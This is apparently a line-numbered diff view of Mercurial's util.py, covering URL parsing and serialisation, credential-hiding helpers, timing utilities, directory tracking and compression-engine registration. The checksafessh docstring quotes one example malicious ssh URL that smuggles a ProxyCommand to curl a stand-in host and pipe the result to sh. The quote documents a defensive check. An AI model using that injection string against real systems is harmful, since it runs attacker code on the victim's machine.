2779 if self._localpath:
2785 if self._localpath:
2780 self.path = path
2786 self.path = path
2781 return
2787 return
2782
2788
2783 if parsequery and '?' in path:
2789 if parsequery and '?' in path:
2784 path, self.query = path.split('?', 1)
2790 path, self.query = path.split('?', 1)
2785 if not path:
2791 if not path:
2786 path = None
2792 path = None
2787 if not self.query:
2793 if not self.query:
2788 self.query = None
2794 self.query = None
2789
2795
2790 # // is required to specify a host/authority
2796 # // is required to specify a host/authority
2791 if path and path.startswith('//'):
2797 if path and path.startswith('//'):
2792 parts = path[2:].split('/', 1)
2798 parts = path[2:].split('/', 1)
2793 if len(parts) > 1:
2799 if len(parts) > 1:
2794 self.host, path = parts
2800 self.host, path = parts
2795 else:
2801 else:
2796 self.host = parts[0]
2802 self.host = parts[0]
2797 path = None
2803 path = None
2798 if not self.host:
2804 if not self.host:
2799 self.host = None
2805 self.host = None
2800 # path of file:///d is /d
2806 # path of file:///d is /d
2801 # path of file:///d:/ is d:/, not /d:/
2807 # path of file:///d:/ is d:/, not /d:/
2802 if path and not hasdriveletter(path):
2808 if path and not hasdriveletter(path):
2803 path = '/' + path
2809 path = '/' + path
2804
2810
2805 if self.host and '@' in self.host:
2811 if self.host and '@' in self.host:
2806 self.user, self.host = self.host.rsplit('@', 1)
2812 self.user, self.host = self.host.rsplit('@', 1)
2807 if ':' in self.user:
2813 if ':' in self.user:
2808 self.user, self.passwd = self.user.split(':', 1)
2814 self.user, self.passwd = self.user.split(':', 1)
2809 if not self.host:
2815 if not self.host:
2810 self.host = None
2816 self.host = None
2811
2817
2812 # Don't split on colons in IPv6 addresses without ports
2818 # Don't split on colons in IPv6 addresses without ports
2813 if (self.host and ':' in self.host and
2819 if (self.host and ':' in self.host and
2814 not (self.host.startswith('[') and self.host.endswith(']'))):
2820 not (self.host.startswith('[') and self.host.endswith(']'))):
2815 self._hostport = self.host
2821 self._hostport = self.host
2816 self.host, self.port = self.host.rsplit(':', 1)
2822 self.host, self.port = self.host.rsplit(':', 1)
2817 if not self.host:
2823 if not self.host:
2818 self.host = None
2824 self.host = None
2819
2825
2820 if (self.host and self.scheme == 'file' and
2826 if (self.host and self.scheme == 'file' and
2821 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2827 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2822 raise error.Abort(_('file:// URLs can only refer to localhost'))
2828 raise error.Abort(_('file:// URLs can only refer to localhost'))
2823
2829
2824 self.path = path
2830 self.path = path
2825
2831
2826 # leave the query string escaped
2832 # leave the query string escaped
2827 for a in ('user', 'passwd', 'host', 'port',
2833 for a in ('user', 'passwd', 'host', 'port',
2828 'path', 'fragment'):
2834 'path', 'fragment'):
2829 v = getattr(self, a)
2835 v = getattr(self, a)
2830 if v is not None:
2836 if v is not None:
2831 setattr(self, a, urlreq.unquote(v))
2837 setattr(self, a, urlreq.unquote(v))
2832
2838
2833 @encoding.strmethod
2839 @encoding.strmethod
2834 def __repr__(self):
2840 def __repr__(self):
2835 attrs = []
2841 attrs = []
2836 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2842 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2837 'query', 'fragment'):
2843 'query', 'fragment'):
2838 v = getattr(self, a)
2844 v = getattr(self, a)
2839 if v is not None:
2845 if v is not None:
2840 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2846 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2841 return '<url %s>' % ', '.join(attrs)
2847 return '<url %s>' % ', '.join(attrs)
2842
2848
2843 def __bytes__(self):
2849 def __bytes__(self):
2844 r"""Join the URL's components back into a URL string.
2850 r"""Join the URL's components back into a URL string.
2845
2851
2846 Examples:
2852 Examples:
2847
2853
2848 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2854 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2849 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2855 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2850 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2856 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2851 'http://user:pw@host:80/?foo=bar&baz=42'
2857 'http://user:pw@host:80/?foo=bar&baz=42'
2852 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2858 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2853 'http://user:pw@host:80/?foo=bar%3dbaz'
2859 'http://user:pw@host:80/?foo=bar%3dbaz'
2854 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2860 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2855 'ssh://user:pw@[::1]:2200//home/joe#'
2861 'ssh://user:pw@[::1]:2200//home/joe#'
2856 >>> bytes(url(b'http://localhost:80//'))
2862 >>> bytes(url(b'http://localhost:80//'))
2857 'http://localhost:80//'
2863 'http://localhost:80//'
2858 >>> bytes(url(b'http://localhost:80/'))
2864 >>> bytes(url(b'http://localhost:80/'))
2859 'http://localhost:80/'
2865 'http://localhost:80/'
2860 >>> bytes(url(b'http://localhost:80'))
2866 >>> bytes(url(b'http://localhost:80'))
2861 'http://localhost:80/'
2867 'http://localhost:80/'
2862 >>> bytes(url(b'bundle:foo'))
2868 >>> bytes(url(b'bundle:foo'))
2863 'bundle:foo'
2869 'bundle:foo'
2864 >>> bytes(url(b'bundle://../foo'))
2870 >>> bytes(url(b'bundle://../foo'))
2865 'bundle:../foo'
2871 'bundle:../foo'
2866 >>> bytes(url(b'path'))
2872 >>> bytes(url(b'path'))
2867 'path'
2873 'path'
2868 >>> bytes(url(b'file:///tmp/foo/bar'))
2874 >>> bytes(url(b'file:///tmp/foo/bar'))
2869 'file:///tmp/foo/bar'
2875 'file:///tmp/foo/bar'
2870 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2876 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2871 'file:///c:/tmp/foo/bar'
2877 'file:///c:/tmp/foo/bar'
2872 >>> print(url(br'bundle:foo\bar'))
2878 >>> print(url(br'bundle:foo\bar'))
2873 bundle:foo\bar
2879 bundle:foo\bar
2874 >>> print(url(br'file:///D:\data\hg'))
2880 >>> print(url(br'file:///D:\data\hg'))
2875 file:///D:\data\hg
2881 file:///D:\data\hg
2876 """
2882 """
2877 if self._localpath:
2883 if self._localpath:
2878 s = self.path
2884 s = self.path
2879 if self.scheme == 'bundle':
2885 if self.scheme == 'bundle':
2880 s = 'bundle:' + s
2886 s = 'bundle:' + s
2881 if self.fragment:
2887 if self.fragment:
2882 s += '#' + self.fragment
2888 s += '#' + self.fragment
2883 return s
2889 return s
2884
2890
2885 s = self.scheme + ':'
2891 s = self.scheme + ':'
2886 if self.user or self.passwd or self.host:
2892 if self.user or self.passwd or self.host:
2887 s += '//'
2893 s += '//'
2888 elif self.scheme and (not self.path or self.path.startswith('/')
2894 elif self.scheme and (not self.path or self.path.startswith('/')
2889 or hasdriveletter(self.path)):
2895 or hasdriveletter(self.path)):
2890 s += '//'
2896 s += '//'
2891 if hasdriveletter(self.path):
2897 if hasdriveletter(self.path):
2892 s += '/'
2898 s += '/'
2893 if self.user:
2899 if self.user:
2894 s += urlreq.quote(self.user, safe=self._safechars)
2900 s += urlreq.quote(self.user, safe=self._safechars)
2895 if self.passwd:
2901 if self.passwd:
2896 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2902 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2897 if self.user or self.passwd:
2903 if self.user or self.passwd:
2898 s += '@'
2904 s += '@'
2899 if self.host:
2905 if self.host:
2900 if not (self.host.startswith('[') and self.host.endswith(']')):
2906 if not (self.host.startswith('[') and self.host.endswith(']')):
2901 s += urlreq.quote(self.host)
2907 s += urlreq.quote(self.host)
2902 else:
2908 else:
2903 s += self.host
2909 s += self.host
2904 if self.port:
2910 if self.port:
2905 s += ':' + urlreq.quote(self.port)
2911 s += ':' + urlreq.quote(self.port)
2906 if self.host:
2912 if self.host:
2907 s += '/'
2913 s += '/'
2908 if self.path:
2914 if self.path:
2909 # TODO: similar to the query string, we should not unescape the
2915 # TODO: similar to the query string, we should not unescape the
2910 # path when we store it, the path might contain '%2f' = '/',
2916 # path when we store it, the path might contain '%2f' = '/',
2911 # which we should *not* escape.
2917 # which we should *not* escape.
2912 s += urlreq.quote(self.path, safe=self._safepchars)
2918 s += urlreq.quote(self.path, safe=self._safepchars)
2913 if self.query:
2919 if self.query:
2914 # we store the query in escaped form.
2920 # we store the query in escaped form.
2915 s += '?' + self.query
2921 s += '?' + self.query
2916 if self.fragment is not None:
2922 if self.fragment is not None:
2917 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2923 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2918 return s
2924 return s
2919
2925
2920 __str__ = encoding.strmethod(__bytes__)
2926 __str__ = encoding.strmethod(__bytes__)
2921
2927
2922 def authinfo(self):
2928 def authinfo(self):
2923 user, passwd = self.user, self.passwd
2929 user, passwd = self.user, self.passwd
2924 try:
2930 try:
2925 self.user, self.passwd = None, None
2931 self.user, self.passwd = None, None
2926 s = bytes(self)
2932 s = bytes(self)
2927 finally:
2933 finally:
2928 self.user, self.passwd = user, passwd
2934 self.user, self.passwd = user, passwd
2929 if not self.user:
2935 if not self.user:
2930 return (s, None)
2936 return (s, None)
2931 # authinfo[1] is passed to urllib2 password manager, and its
2937 # authinfo[1] is passed to urllib2 password manager, and its
2932 # URIs must not contain credentials. The host is passed in the
2938 # URIs must not contain credentials. The host is passed in the
2933 # URIs list because Python < 2.4.3 uses only that to search for
2939 # URIs list because Python < 2.4.3 uses only that to search for
2934 # a password.
2940 # a password.
2935 return (s, (None, (s, self.host),
2941 return (s, (None, (s, self.host),
2936 self.user, self.passwd or ''))
2942 self.user, self.passwd or ''))
2937
2943
2938 def isabs(self):
2944 def isabs(self):
2939 if self.scheme and self.scheme != 'file':
2945 if self.scheme and self.scheme != 'file':
2940 return True # remote URL
2946 return True # remote URL
2941 if hasdriveletter(self.path):
2947 if hasdriveletter(self.path):
2942 return True # absolute for our purposes - can't be joined()
2948 return True # absolute for our purposes - can't be joined()
2943 if self.path.startswith(br'\\'):
2949 if self.path.startswith(br'\\'):
2944 return True # Windows UNC path
2950 return True # Windows UNC path
2945 if self.path.startswith('/'):
2951 if self.path.startswith('/'):
2946 return True # POSIX-style
2952 return True # POSIX-style
2947 return False
2953 return False
2948
2954
2949 def localpath(self):
2955 def localpath(self):
2950 if self.scheme == 'file' or self.scheme == 'bundle':
2956 if self.scheme == 'file' or self.scheme == 'bundle':
2951 path = self.path or '/'
2957 path = self.path or '/'
2952 # For Windows, we need to promote hosts containing drive
2958 # For Windows, we need to promote hosts containing drive
2953 # letters to paths with drive letters.
2959 # letters to paths with drive letters.
2954 if hasdriveletter(self._hostport):
2960 if hasdriveletter(self._hostport):
2955 path = self._hostport + '/' + self.path
2961 path = self._hostport + '/' + self.path
2956 elif (self.host is not None and self.path
2962 elif (self.host is not None and self.path
2957 and not hasdriveletter(path)):
2963 and not hasdriveletter(path)):
2958 path = '/' + path
2964 path = '/' + path
2959 return path
2965 return path
2960 return self._origpath
2966 return self._origpath
2961
2967
2962 def islocal(self):
2968 def islocal(self):
2963 '''whether localpath will return something that posixfile can open'''
2969 '''whether localpath will return something that posixfile can open'''
2964 return (not self.scheme or self.scheme == 'file'
2970 return (not self.scheme or self.scheme == 'file'
2965 or self.scheme == 'bundle')
2971 or self.scheme == 'bundle')
2966
2972
2967 def hasscheme(path):
2973 def hasscheme(path):
2968 return bool(url(path).scheme)
2974 return bool(url(path).scheme)
2969
2975
2970 def hasdriveletter(path):
2976 def hasdriveletter(path):
2971 return path and path[1:2] == ':' and path[0:1].isalpha()
2977 return path and path[1:2] == ':' and path[0:1].isalpha()
2972
2978
2973 def urllocalpath(path):
2979 def urllocalpath(path):
2974 return url(path, parsequery=False, parsefragment=False).localpath()
2980 return url(path, parsequery=False, parsefragment=False).localpath()
2975
2981
2976 def checksafessh(path):
2982 def checksafessh(path):
2977 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2983 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2978
2984
2979 This is a sanity check for ssh urls. ssh will parse the first item as
2985 This is a sanity check for ssh urls. ssh will parse the first item as
2980 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2986 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2981 Let's prevent these potentially exploited urls entirely and warn the
2987 Let's prevent these potentially exploited urls entirely and warn the
2982 user.
2988 user.
2983
2989
2984 Raises an error.Abort when the url is unsafe.
2990 Raises an error.Abort when the url is unsafe.
2985 """
2991 """
2986 path = urlreq.unquote(path)
2992 path = urlreq.unquote(path)
2987 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2993 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2988 raise error.Abort(_('potentially unsafe url: %r') %
2994 raise error.Abort(_('potentially unsafe url: %r') %
2989 (pycompat.bytestr(path),))
2995 (pycompat.bytestr(path),))
2990
2996
2991 def hidepassword(u):
2997 def hidepassword(u):
2992 '''hide user credential in a url string'''
2998 '''hide user credential in a url string'''
2993 u = url(u)
2999 u = url(u)
2994 if u.passwd:
3000 if u.passwd:
2995 u.passwd = '***'
3001 u.passwd = '***'
2996 return bytes(u)
3002 return bytes(u)
2997
3003
2998 def removeauth(u):
3004 def removeauth(u):
2999 '''remove all authentication information from a url string'''
3005 '''remove all authentication information from a url string'''
3000 u = url(u)
3006 u = url(u)
3001 u.user = u.passwd = None
3007 u.user = u.passwd = None
3002 return bytes(u)
3008 return bytes(u)
3003
3009
3004 timecount = unitcountfn(
3010 timecount = unitcountfn(
3005 (1, 1e3, _('%.0f s')),
3011 (1, 1e3, _('%.0f s')),
3006 (100, 1, _('%.1f s')),
3012 (100, 1, _('%.1f s')),
3007 (10, 1, _('%.2f s')),
3013 (10, 1, _('%.2f s')),
3008 (1, 1, _('%.3f s')),
3014 (1, 1, _('%.3f s')),
3009 (100, 0.001, _('%.1f ms')),
3015 (100, 0.001, _('%.1f ms')),
3010 (10, 0.001, _('%.2f ms')),
3016 (10, 0.001, _('%.2f ms')),
3011 (1, 0.001, _('%.3f ms')),
3017 (1, 0.001, _('%.3f ms')),
3012 (100, 0.000001, _('%.1f us')),
3018 (100, 0.000001, _('%.1f us')),
3013 (10, 0.000001, _('%.2f us')),
3019 (10, 0.000001, _('%.2f us')),
3014 (1, 0.000001, _('%.3f us')),
3020 (1, 0.000001, _('%.3f us')),
3015 (100, 0.000000001, _('%.1f ns')),
3021 (100, 0.000000001, _('%.1f ns')),
3016 (10, 0.000000001, _('%.2f ns')),
3022 (10, 0.000000001, _('%.2f ns')),
3017 (1, 0.000000001, _('%.3f ns')),
3023 (1, 0.000000001, _('%.3f ns')),
3018 )
3024 )
3019
3025
3020 @attr.s
3026 @attr.s
3021 class timedcmstats(object):
3027 class timedcmstats(object):
3022 """Stats information produced by the timedcm context manager on entering."""
3028 """Stats information produced by the timedcm context manager on entering."""
3023
3029
3024 # the starting value of the timer as a float (meaning and resulution is
3030 # the starting value of the timer as a float (meaning and resulution is
3025 # platform dependent, see util.timer)
3031 # platform dependent, see util.timer)
3026 start = attr.ib(default=attr.Factory(lambda: timer()))
3032 start = attr.ib(default=attr.Factory(lambda: timer()))
3027 # the number of seconds as a floating point value; starts at 0, updated when
3033 # the number of seconds as a floating point value; starts at 0, updated when
3028 # the context is exited.
3034 # the context is exited.
3029 elapsed = attr.ib(default=0)
3035 elapsed = attr.ib(default=0)
3030 # the number of nested timedcm context managers.
3036 # the number of nested timedcm context managers.
3031 level = attr.ib(default=1)
3037 level = attr.ib(default=1)
3032
3038
3033 def __bytes__(self):
3039 def __bytes__(self):
3034 return timecount(self.elapsed) if self.elapsed else '<unknown>'
3040 return timecount(self.elapsed) if self.elapsed else '<unknown>'
3035
3041
3036 __str__ = encoding.strmethod(__bytes__)
3042 __str__ = encoding.strmethod(__bytes__)
3037
3043
3038 @contextlib.contextmanager
3044 @contextlib.contextmanager
3039 def timedcm(whencefmt, *whenceargs):
3045 def timedcm(whencefmt, *whenceargs):
3040 """A context manager that produces timing information for a given context.
3046 """A context manager that produces timing information for a given context.
3041
3047
3042 On entering a timedcmstats instance is produced.
3048 On entering a timedcmstats instance is produced.
3043
3049
3044 This context manager is reentrant.
3050 This context manager is reentrant.
3045
3051
3046 """
3052 """
3047 # track nested context managers
3053 # track nested context managers
3048 timedcm._nested += 1
3054 timedcm._nested += 1
3049 timing_stats = timedcmstats(level=timedcm._nested)
3055 timing_stats = timedcmstats(level=timedcm._nested)
3050 try:
3056 try:
3051 with tracing.log(whencefmt, *whenceargs):
3057 with tracing.log(whencefmt, *whenceargs):
3052 yield timing_stats
3058 yield timing_stats
3053 finally:
3059 finally:
3054 timing_stats.elapsed = timer() - timing_stats.start
3060 timing_stats.elapsed = timer() - timing_stats.start
3055 timedcm._nested -= 1
3061 timedcm._nested -= 1
3056
3062
3057 timedcm._nested = 0
3063 timedcm._nested = 0
3058
3064
3059 def timed(func):
3065 def timed(func):
3060 '''Report the execution time of a function call to stderr.
3066 '''Report the execution time of a function call to stderr.
3061
3067
3062 During development, use as a decorator when you need to measure
3068 During development, use as a decorator when you need to measure
3063 the cost of a function, e.g. as follows:
3069 the cost of a function, e.g. as follows:
3064
3070
3065 @util.timed
3071 @util.timed
3066 def foo(a, b, c):
3072 def foo(a, b, c):
3067 pass
3073 pass
3068 '''
3074 '''
3069
3075
3070 def wrapper(*args, **kwargs):
3076 def wrapper(*args, **kwargs):
3071 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3077 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3072 result = func(*args, **kwargs)
3078 result = func(*args, **kwargs)
3073 stderr = procutil.stderr
3079 stderr = procutil.stderr
3074 stderr.write('%s%s: %s\n' % (
3080 stderr.write('%s%s: %s\n' % (
3075 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
3081 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
3076 time_stats))
3082 time_stats))
3077 return result
3083 return result
3078 return wrapper
3084 return wrapper
3079
3085
3080 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3086 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3081 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3087 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3082
3088
3083 def sizetoint(s):
3089 def sizetoint(s):
3084 '''Convert a space specifier to a byte count.
3090 '''Convert a space specifier to a byte count.
3085
3091
3086 >>> sizetoint(b'30')
3092 >>> sizetoint(b'30')
3087 30
3093 30
3088 >>> sizetoint(b'2.2kb')
3094 >>> sizetoint(b'2.2kb')
3089 2252
3095 2252
3090 >>> sizetoint(b'6M')
3096 >>> sizetoint(b'6M')
3091 6291456
3097 6291456
3092 '''
3098 '''
3093 t = s.strip().lower()
3099 t = s.strip().lower()
3094 try:
3100 try:
3095 for k, u in _sizeunits:
3101 for k, u in _sizeunits:
3096 if t.endswith(k):
3102 if t.endswith(k):
3097 return int(float(t[:-len(k)]) * u)
3103 return int(float(t[:-len(k)]) * u)
3098 return int(t)
3104 return int(t)
3099 except ValueError:
3105 except ValueError:
3100 raise error.ParseError(_("couldn't parse size: %s") % s)
3106 raise error.ParseError(_("couldn't parse size: %s") % s)
3101
3107
3102 class hooks(object):
3108 class hooks(object):
3103 '''A collection of hook functions that can be used to extend a
3109 '''A collection of hook functions that can be used to extend a
3104 function's behavior. Hooks are called in lexicographic order,
3110 function's behavior. Hooks are called in lexicographic order,
3105 based on the names of their sources.'''
3111 based on the names of their sources.'''
3106
3112
3107 def __init__(self):
3113 def __init__(self):
3108 self._hooks = []
3114 self._hooks = []
3109
3115
3110 def add(self, source, hook):
3116 def add(self, source, hook):
3111 self._hooks.append((source, hook))
3117 self._hooks.append((source, hook))
3112
3118
3113 def __call__(self, *args):
3119 def __call__(self, *args):
3114 self._hooks.sort(key=lambda x: x[0])
3120 self._hooks.sort(key=lambda x: x[0])
3115 results = []
3121 results = []
3116 for source, hook in self._hooks:
3122 for source, hook in self._hooks:
3117 results.append(hook(*args))
3123 results.append(hook(*args))
3118 return results
3124 return results
3119
3125
3120 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3126 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3121 '''Yields lines for a nicely formatted stacktrace.
3127 '''Yields lines for a nicely formatted stacktrace.
3122 Skips the 'skip' last entries, then return the last 'depth' entries.
3128 Skips the 'skip' last entries, then return the last 'depth' entries.
3123 Each file+linenumber is formatted according to fileline.
3129 Each file+linenumber is formatted according to fileline.
3124 Each line is formatted according to line.
3130 Each line is formatted according to line.
3125 If line is None, it yields:
3131 If line is None, it yields:
3126 length of longest filepath+line number,
3132 length of longest filepath+line number,
3127 filepath+linenumber,
3133 filepath+linenumber,
3128 function
3134 function
3129
3135
3130 Not be used in production code but very convenient while developing.
3136 Not be used in production code but very convenient while developing.
3131 '''
3137 '''
3132 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3138 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3133 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3139 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3134 ][-depth:]
3140 ][-depth:]
3135 if entries:
3141 if entries:
3136 fnmax = max(len(entry[0]) for entry in entries)
3142 fnmax = max(len(entry[0]) for entry in entries)
3137 for fnln, func in entries:
3143 for fnln, func in entries:
3138 if line is None:
3144 if line is None:
3139 yield (fnmax, fnln, func)
3145 yield (fnmax, fnln, func)
3140 else:
3146 else:
3141 yield line % (fnmax, fnln, func)
3147 yield line % (fnmax, fnln, func)
3142
3148
3143 def debugstacktrace(msg='stacktrace', skip=0,
3149 def debugstacktrace(msg='stacktrace', skip=0,
3144 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3150 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3145 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3151 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3146 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3152 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3147 By default it will flush stdout first.
3153 By default it will flush stdout first.
3148 It can be used everywhere and intentionally does not require an ui object.
3154 It can be used everywhere and intentionally does not require an ui object.
3149 Not be used in production code but very convenient while developing.
3155 Not be used in production code but very convenient while developing.
3150 '''
3156 '''
3151 if otherf:
3157 if otherf:
3152 otherf.flush()
3158 otherf.flush()
3153 f.write('%s at:\n' % msg.rstrip())
3159 f.write('%s at:\n' % msg.rstrip())
3154 for line in getstackframes(skip + 1, depth=depth):
3160 for line in getstackframes(skip + 1, depth=depth):
3155 f.write(line)
3161 f.write(line)
3156 f.flush()
3162 f.flush()
3157
3163
3158 class dirs(object):
3164 class dirs(object):
3159 '''a multiset of directory names from a dirstate or manifest'''
3165 '''a multiset of directory names from a dirstate or manifest'''
3160
3166
3161 def __init__(self, map, skip=None):
3167 def __init__(self, map, skip=None):
3162 self._dirs = {}
3168 self._dirs = {}
3163 addpath = self.addpath
3169 addpath = self.addpath
3164 if safehasattr(map, 'iteritems') and skip is not None:
3170 if safehasattr(map, 'iteritems') and skip is not None:
3165 for f, s in map.iteritems():
3171 for f, s in map.iteritems():
3166 if s[0] != skip:
3172 if s[0] != skip:
3167 addpath(f)
3173 addpath(f)
3168 else:
3174 else:
3169 for f in map:
3175 for f in map:
3170 addpath(f)
3176 addpath(f)
3171
3177
3172 def addpath(self, path):
3178 def addpath(self, path):
3173 dirs = self._dirs
3179 dirs = self._dirs
3174 for base in finddirs(path):
3180 for base in finddirs(path):
3175 if base in dirs:
3181 if base in dirs:
3176 dirs[base] += 1
3182 dirs[base] += 1
3177 return
3183 return
3178 dirs[base] = 1
3184 dirs[base] = 1
3179
3185
3180 def delpath(self, path):
3186 def delpath(self, path):
3181 dirs = self._dirs
3187 dirs = self._dirs
3182 for base in finddirs(path):
3188 for base in finddirs(path):
3183 if dirs[base] > 1:
3189 if dirs[base] > 1:
3184 dirs[base] -= 1
3190 dirs[base] -= 1
3185 return
3191 return
3186 del dirs[base]
3192 del dirs[base]
3187
3193
3188 def __iter__(self):
3194 def __iter__(self):
3189 return iter(self._dirs)
3195 return iter(self._dirs)
3190
3196
3191 def __contains__(self, d):
3197 def __contains__(self, d):
3192 return d in self._dirs
3198 return d in self._dirs
3193
3199
3194 if safehasattr(parsers, 'dirs'):
3200 if safehasattr(parsers, 'dirs'):
3195 dirs = parsers.dirs
3201 dirs = parsers.dirs
3196
3202
3197 def finddirs(path):
3203 def finddirs(path):
3198 pos = path.rfind('/')
3204 pos = path.rfind('/')
3199 while pos != -1:
3205 while pos != -1:
3200 yield path[:pos]
3206 yield path[:pos]
3201 pos = path.rfind('/', 0, pos)
3207 pos = path.rfind('/', 0, pos)
3202
3208
3203 # compression code
3209 # compression code
3204
3210
3205 SERVERROLE = 'server'
3211 SERVERROLE = 'server'
3206 CLIENTROLE = 'client'
3212 CLIENTROLE = 'client'
3207
3213
3208 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3214 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3209 (u'name', u'serverpriority',
3215 (u'name', u'serverpriority',
3210 u'clientpriority'))
3216 u'clientpriority'))
3211
3217
3212 class compressormanager(object):
3218 class compressormanager(object):
3213 """Holds registrations of various compression engines.
3219 """Holds registrations of various compression engines.
3214
3220
3215 This class essentially abstracts the differences between compression
3221 This class essentially abstracts the differences between compression
3216 engines to allow new compression formats to be added easily, possibly from
3222 engines to allow new compression formats to be added easily, possibly from
3217 extensions.
3223 extensions.
3218
3224
3219 Compressors are registered against the global instance by calling its
3225 Compressors are registered against the global instance by calling its
3220 ``register()`` method.
3226 ``register()`` method.
3221 """
3227 """
3222 def __init__(self):
3228 def __init__(self):
3223 self._engines = {}
3229 self._engines = {}
3224 # Bundle spec human name to engine name.
3230 # Bundle spec human name to engine name.
3225 self._bundlenames = {}
3231 self._bundlenames = {}
3226 # Internal bundle identifier to engine name.
3232 # Internal bundle identifier to engine name.
3227 self._bundletypes = {}
3233 self._bundletypes = {}
3228 # Revlog header to engine name.
3234 # Revlog header to engine name.
3229 self._revlogheaders = {}
3235 self._revlogheaders = {}
3230 # Wire proto identifier to engine name.
3236 # Wire proto identifier to engine name.
3231 self._wiretypes = {}
3237 self._wiretypes = {}
3232
3238
3233 def __getitem__(self, key):
3239 def __getitem__(self, key):
3234 return self._engines[key]
3240 return self._engines[key]
3235
3241
3236 def __contains__(self, key):
3242 def __contains__(self, key):
3237 return key in self._engines
3243 return key in self._engines
3238
3244
3239 def __iter__(self):
3245 def __iter__(self):
3240 return iter(self._engines.keys())
3246 return iter(self._engines.keys())
3241
3247
3242 def register(self, engine):
3248 def register(self, engine):
3243 """Register a compression engine with the manager.
3249 """Register a compression engine with the manager.
3244
3250
3245 The argument must be a ``compressionengine`` instance.
3251 The argument must be a ``compressionengine`` instance.
3246 """
3252 """
3247 if not isinstance(engine, compressionengine):
3253 if not isinstance(engine, compressionengine):
3248 raise ValueError(_('argument must be a compressionengine'))
3254 raise ValueError(_('argument must be a compressionengine'))
3249
3255
3250 name = engine.name()
3256 name = engine.name()
3251
3257
3252 if name in self._engines:
3258 if name in self._engines:
3253 raise error.Abort(_('compression engine %s already registered') %
3259 raise error.Abort(_('compression engine %s already registered') %
3254 name)
3260 name)
3255
3261
3256 bundleinfo = engine.bundletype()
3262 bundleinfo = engine.bundletype()
3257 if bundleinfo:
3263 if bundleinfo:
3258 bundlename, bundletype = bundleinfo
3264 bundlename, bundletype = bundleinfo
3259
3265
3260 if bundlename in self._bundlenames:
3266 if bundlename in self._bundlenames:
3261 raise error.Abort(_('bundle name %s already registered') %
3267 raise error.Abort(_('bundle name %s already registered') %
3262 bundlename)
3268 bundlename)
3263 if bundletype in self._bundletypes:
3269 if bundletype in self._bundletypes:
3264 raise error.Abort(_('bundle type %s already registered by %s') %
3270 raise error.Abort(_('bundle type %s already registered by %s') %
3265 (bundletype, self._bundletypes[bundletype]))
3271 (bundletype, self._bundletypes[bundletype]))
3266
3272
3267 # No external facing name declared.
3273 # No external facing name declared.
3268 if bundlename:
3274 if bundlename:
3269 self._bundlenames[bundlename] = name
3275 self._bundlenames[bundlename] = name
3270
3276
3271 self._bundletypes[bundletype] = name
3277 self._bundletypes[bundletype] = name
3272
3278
3273 wiresupport = engine.wireprotosupport()
3279 wiresupport = engine.wireprotosupport()
3274 if wiresupport:
3280 if wiresupport:
3275 wiretype = wiresupport.name
3281 wiretype = wiresupport.name
3276 if wiretype in self._wiretypes:
3282 if wiretype in self._wiretypes:
3277 raise error.Abort(_('wire protocol compression %s already '
3283 raise error.Abort(_('wire protocol compression %s already '
3278 'registered by %s') %
3284 'registered by %s') %
3279 (wiretype, self._wiretypes[wiretype]))
3285 (wiretype, self._wiretypes[wiretype]))
3280
3286
3281 self._wiretypes[wiretype] = name
3287 self._wiretypes[wiretype] = name
3282
3288
3283 revlogheader = engine.revlogheader()
3289 revlogheader = engine.revlogheader()
3284 if revlogheader and revlogheader in self._revlogheaders:
3290 if revlogheader and revlogheader in self._revlogheaders:
3285 raise error.Abort(_('revlog header %s already registered by %s') %
3291 raise error.Abort(_('revlog header %s already registered by %s') %
3286 (revlogheader, self._revlogheaders[revlogheader]))
